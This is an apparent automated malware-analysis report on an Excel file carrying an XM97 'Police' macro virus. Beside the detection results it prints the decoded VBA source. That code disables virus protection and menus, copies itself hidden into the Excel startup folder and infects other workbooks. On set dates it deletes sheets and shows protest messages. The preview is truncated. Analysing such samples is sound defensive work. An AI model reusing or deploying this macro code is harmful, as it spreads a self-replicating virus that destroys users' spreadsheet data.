MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing VBA macros, including an Auto_Open macro, which is a common technique for executing malicious code upon opening. The script attempts to save a file named 'FUCKPOL.XLM' to the startup path, indicating a likely downloader or dropper functionality. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Xls.Trojan.Neg-4' further support its malicious nature.
Heuristics 4
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5451 bytes |
SHA-256: a1e8b706d069ac185db2876655105c9e8dadeeaa13d29d14aa1b588b87e8b3c7 |
|||
|
Detection
ClamAV:
Xls.Trojan.Neg-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Police"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
CommandBars("window").Controls("Unhide...").Delete
If spy() Then
GoTo shotme:
Else
fire
End If
shotme:
Application.OnSheetActivate = "FUCKPOL.XLM!action"
bye:
Call effect
End Sub
Function spy() As Boolean
Attribute spy.VB_ProcData.VB_Invoke_Func = " \n14"
spy = False
For x = 1 To Application.Workbooks.Count
If Application.Workbooks(x).Name = "FUCKPOL.XLM" Then
For y = 1 To Application.Workbooks("FUCKPOL.XLM").Modules.Count
If Application.Workbooks("FUCKPOL.XLM").Modules(y).Name = "Police" Then
spy = True
End If
Next y
End If
Next x
End Function
Function fire()
Attribute fire.VB_ProcData.VB_Invoke_Func = " \n14"
activebook = ActiveWorkbook.Name
Workbooks(activebook).SaveCopyAs Application.StartupPath + "\FUCKPOL.XLM"
Workbooks.Open (Application.StartupPath + "\FUCKPOL.XLM")
Windows("FUCKPOL.XLM").Visible = False
Application.Workbooks("FUCKPOL.XLM").Save
End Function
Function statusme() As Boolean
Attribute statusme.VB_ProcData.VB_Invoke_Func = " \n14"
activebook = ActiveWorkbook.Name
statusme = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
If Application.Workbooks(activebook).Modules(y).Name = "Police" Then
statusme = True
End If
Next y
End Function
Sub action()
Attribute action.VB_ProcData.VB_Invoke_Func = " \n14"
oactivebook = ActiveWorkbook.Name
If statusme() Then
GoTo bye2
Else
End If
Application.ScreenUpdating = False
Application.Windows("FUCKPOL.XLM").Visible = True
Workbooks("FUCKPOL.XLM").Activate
Sheets("Police").Visible = True
Workbooks("FUCKPOL.XLM").Sheets("Police").Copy Before:=Workbooks(oactivebook).Sheets(1)
Workbooks(oactivebook).Sheets("Police").Visible = False
Workbooks("FUCKPOL.XLM").Sheets("Police").Visible = False
Windows("FUCKPOL.XLM").Visible = False
bye2:
Close
End Sub
Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo bye3
Application.DisplayAlerts = False
Application.Workbooks("FUCKPOL.XLM").Save
Application.ActiveWorkbook.Save
bye3:
End Sub
Sub effect()
Attribute effect.VB_ProcData.VB_Invoke_Func = " \n14"
If Application.UserName = "foxz" And Application.OrganizationName = "NoMercyVirusTeam" Then
GoTo boss
Else
End If
If Day(Date) = "13" Or Day(Date) = "1" Or Day(Date) = "31" Then
ActiveWindow.SelectedSheets.Delete
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "Six students of Universitas Trisakti, Jakarta, died from bullets fired by security personnel during an action of concern staged by thousands of students at the campus of Universitas Trisakti, Grogol, West Jakarta, on Tuesday (12/5). The six students were shot while on campus by a flurry of bullets, suspected to be fired by security troops on the Grogol fly-over. Dozens of other students suffered serious and minor injuries."
.Heading = "XM97.Fucking Police"
.Animation = msoAnimationEmptyTrash
.Show
End With
Assistant.Visible = False
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "Until this report was prepared, around 200 students were still waiting in the corridors of the Sumber Waras Hospital, guarding their fellow-students still being treated in the Emergency Unit, as well as the remains of their colleagues laying in state. A moving atmosphere prevailed around t
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.